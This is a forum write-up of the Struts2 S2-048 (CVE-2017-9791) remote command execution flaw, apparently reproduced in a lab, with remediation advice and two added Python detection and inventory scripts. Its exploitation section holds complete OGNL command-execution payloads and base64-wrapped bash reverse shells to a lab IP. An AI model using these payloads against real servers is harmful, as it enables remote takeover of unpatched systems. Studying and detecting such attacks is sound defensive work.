我爱普洱茶 posted on 2023-1-10 23:41:34

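S2-048 CVE-2017-9791 Remote Command Execution

Vulnerability name

S2-048 CVE-2017-9791 Remote Command Execution
Exploitation conditions

Struts 2.3.x
The Struts 1 plugin and a Struts 1 action are enabled
Vulnerability principle

The vulnerability arises because a user-controllable value is added to an ActionMessage and displayed on the client front end. This causes the value to reach the getText function, where the message is finally evaluated as an OGNL expression. So access /integration/saveGangster.action and construct a payload to test for it.
Exploitation

Vulnerability detection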

The OGNL expression is triggered in the Gangster Name form field.
Enter ${33*3} to see the evaluation result (fill in the other two fields with anything).
Exploitation

Command execution

poc1

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())).(#q)}
poc2

Works on Windows and Linux
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Online URLEncode / URLDecode tool - UU Online Tools (uutool.cn)
After encoding the special characters in Burp, both execute.
Vulnerability detection script

GitHub - dragoneeg/Struts2-048: CVE-2017-9791
Getting a shell

poc1

Generate the shell with Online - Reverse Shell Generator (revshells.com) and put it into base64.
bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvMTIzNCAwPCYgMj4mMQ==}|{base64,-d}|{bash,-i}').getInputStream())).(#q)}
Online URLEncode / URLDecode tool - UU Online Tools (uutool.cn)
poc2

{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Using the script for a reverse shell

GitHub - dragoneeg/Struts2-048: CVE-2017-9791
Remediation recommendations

- Upgrade Apache Struts to the latest version, 2.5.10.1.
- Avoid using the Apache struts2-struts1-plugin. If it is not needed, delete the Apache struts2-struts1-plugin-2.3.x.jar file directly from the "/WEB-INF/lib" directory. If the plugin is used, avoid passing the raw message directly to ActionMessage by string concatenation.
References

https://www.sohu.com/a/155896552_128736
https://si1ent.xyz/2021/02/26/Struts2漏洞汇总/
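
Added example (not part of the original post and not code from the dragoneeg/Struts2-048 project): a defensive check that URL-decodes the parameters of requests to .action endpoints and flags the OGNL delimiters and class references seen in the payloads above. The function names, the marker list and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# OGNL delimiters: the page's probe uses ${...}, its payloads use %{...}.
OGNL_OPEN = re.compile(r"[%$]\{")
# Lower-cased member/class references that appear in the payloads on this page.
RCE_MARKERS = (
    "#_memberaccess",
    "ognlcontext@default_member_access",
    "getexcludedpackagenames",
    "@java.lang.runtime@getruntime",
    "java.lang.processbuilder",
)

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is inspected in clear."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'clean', 'ognl-probe' or 'ognl-rce-attempt' for one parameter value."""
    text = fully_decode(value)
    if not OGNL_OPEN.search(text):
        return "clean"
    lowered = text.lower()
    if any(marker in lowered for marker in RCE_MARKERS):
        return "ognl-rce-attempt"
    return "ognl-probe"

def inspect_request(path, body=""):
    """Return {parameter: verdict} for suspicious parameters sent to a .action URL."""
    target, _, query = path.partition("?")
    if not target.endswith(".action"):
        return {}
    pairs = parse_qsl(query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    verdicts = {name: classify(value) for name, value in pairs}
    return {name: v for name, v in verdicts.items() if v != "clean"}

if __name__ == "__main__":
    # Constructed sample form bodies: benign, encoded probe, double-encoded probe.
    url = "/integration/saveGangster.action"
    for body in ("name=Tony&age=40&description=boss",
                 "name=%24%7B33*3%7D&age=1&description=x",
                 "name=%2524%257B33*3%257D&age=1&description=x"):
        print(body, "->", inspect_request(url, body))
```

A bare delimiter can occur in legitimate input, so "ognl-probe" is a triage signal, while "ognl-rce-attempt" requires one of the class references as well.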
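
Added example (not part of the original post): an inventory check for the remediation recommendations above that lists every struts2-struts1-plugin jar under WEB-INF/lib, both in exploded webapps and inside .war archives. The directory layout, file names and version numbers created by build_sample_tree are constructed.

```python
import os
import re
import zipfile

# The plugin jar named in the remediation section, wherever WEB-INF/lib sits.
PLUGIN_JAR = re.compile(r"(?:^|/)WEB-INF/lib/struts2-struts1-plugin-([\w.\-]+)\.jar$")

def scan_webapps(root):
    """Return sorted (location, version) pairs for each plugin jar under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            match = PLUGIN_JAR.search(rel)
            if match:
                # Jar in an exploded (unpacked) web application.
                hits.append((rel, match.group(1)))
            elif fname.endswith(".war") and zipfile.is_zipfile(full):
                # Jar still packed inside a deployable archive.
                with zipfile.ZipFile(full) as war:
                    for entry in war.namelist():
                        match = PLUGIN_JAR.search(entry)
                        if match:
                            hits.append((f"{rel}!/{entry}", match.group(1)))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample: exploded app with the plugin, clean app, WAR with the plugin."""
    for app, jars in (
        ("showcase", ("struts2-core-2.3.32.jar", "struts2-struts1-plugin-2.3.32.jar")),
        ("clean", ("struts2-core-2.3.32.jar",)),
    ):
        lib = os.path.join(root, app, "WEB-INF", "lib")
        os.makedirs(lib)
        for jar in jars:
            open(os.path.join(lib, jar), "wb").close()
    with zipfile.ZipFile(os.path.join(root, "legacy.war"), "w") as war:
        war.writestr("WEB-INF/web.xml", b"<web-app/>")
        war.writestr("WEB-INF/lib/struts2-struts1-plugin-2.3.24.jar", b"")

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for location, version in scan_webapps(tmp):
            print(f"struts2-struts1-plugin {version}: {location}")
```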
